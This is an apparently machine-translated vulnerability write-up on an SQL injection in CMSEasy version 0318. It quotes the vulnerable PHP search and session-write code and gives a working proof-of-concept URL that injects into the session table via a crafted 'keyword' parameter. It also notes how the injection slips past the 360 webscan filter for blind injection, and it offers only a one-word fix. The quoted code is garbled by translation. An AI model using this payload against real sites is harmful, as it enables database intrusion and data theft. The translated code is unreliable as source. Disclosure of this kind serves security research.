The latest cmseasy Injection
Unfortunately, 360 webscan is not bypassed (in fact, it is easy to bypass)
Cmseasy, latest version 0318, has an injection
Vulnerability file:/lib/default/archive_act.php
250-rows:
Function search_action () {// print_r ($ _ SESSION); exit (); if (front: get ('ule') {front :: $ get ['keyword'] = str_replace ('-', '%', front: $ get ['keyword']); front :: $ get ['keyword'] = urldecode (front: $ get ['keyword']);} if (front: get ('keyword ')&&! Front: post ('keyword') front: $ post ['keyword'] = front: get ('keyword'); front: check_type (front :: post ('keyword'), 'safe '); if (front: post ('keyword') {$ this-> view-> keyword = trim (front :: post ('keyword'); session: set ('keyword', trim (front: post ('keyword');/* if (isset (front :: $ get ['keyword']) front: redirect (preg_replace ('/keyword = [^ &] +/', 'keyword= '. urlencode ($ this-> view-> keyword), front: $ uri); else front: redirect (front: $ uri. '& keyword = '. urlencode ($ this-> view-> keyword); */} else {$ this-> view-> keyword = session: get ('keyword ');} if (preg_match ('/union/I', $ this-> view-> keyword) | preg_match ('/"/I', $ this-> view-> keyword) | preg_match ('/\'/I ', $ this-> view-> keyword) {exit ('invalid parameter ');}
Important code:
if (front::get('ule')) { front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']); front::$get['keyword'] = urldecode(front::$get['keyword']); }
The ule obtained by get exists to enter this condition statement.
-Urldecode after % is changed
As a result, you can directly introduce '. You only need to pass in-27.
Check again
session::set('keyword', trim(front::post('keyword')));
Corresponding function code:
class session { static function get($key) { if (isset($_SESSION[$key])) return $_SESSION[$key]; else return false; } static function set($key,$var) { $_SESSION[$key]=$var; } static function del($key) { unset($_SESSION[$key]); }}//session_start();
Cmseasy performs a write operation after the session value is assigned.
/Lib/plugins/stsession. php
public function write($id,$data) {$sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'";//var_dump($sql);$res = $this->_db->query($sql);$time = time();$row = $this->_db->fetch_array($res);if ($row) {//if ($row['data'] != $data) {$sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";$this->_db->query($sql);//}} else {if (!empty($data)) {$sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')";$this->_db->query($sql);}}return true;}
$ Injection caused by the update operation of data
The subsequent parameter preg_match is not affected after the database operation.
If (preg_match ('/union/I', $ this-> view-> keyword) | preg_match ('/"/I', $ this-> view-> keyword) | preg_match ('/\'/I ', $ this-> view-> keyword) {exit ('invalid parameter ');}
The interception white list has also been changed, and it cannot be used to bypass 360 webscan.
/*** Blocking directory white list */function webscan_white ($ webscan_white_name, $ webscan_white_url = array () {$ url_path = $ _ SERVER ['script _ name']; foreach ($ _ GET as $ key => $ value) {$ url_var. = $ key. "= ". $ value. "&";} if (preg_match ("/". $ webscan_white_name. "/is", $ url_path) = 1 &&! Empty ($ webscan_white_name) {return false;} foreach ($ webscan_white_url as $ key => $ value) {if (! Empty ($ url_var )&&! Empty ($ value) {if (stristr ($ url_path, $ key) & stristr ($ url_var, $ value) {return false ;}} elseif (empty ($ url_var) & empty ($ value) {if (stristr ($ url_path, $ key) {return false ;}} return true ;}
Verify that there is an injection
Http: // 127.0.0.1/cmseasy/index. php? Case = archive & act = search & keyword =-27, client_ip = user ()-23 & ule = 1
Attackers can bypass 360webscan to directly perform blind injection.
Solution:
Filter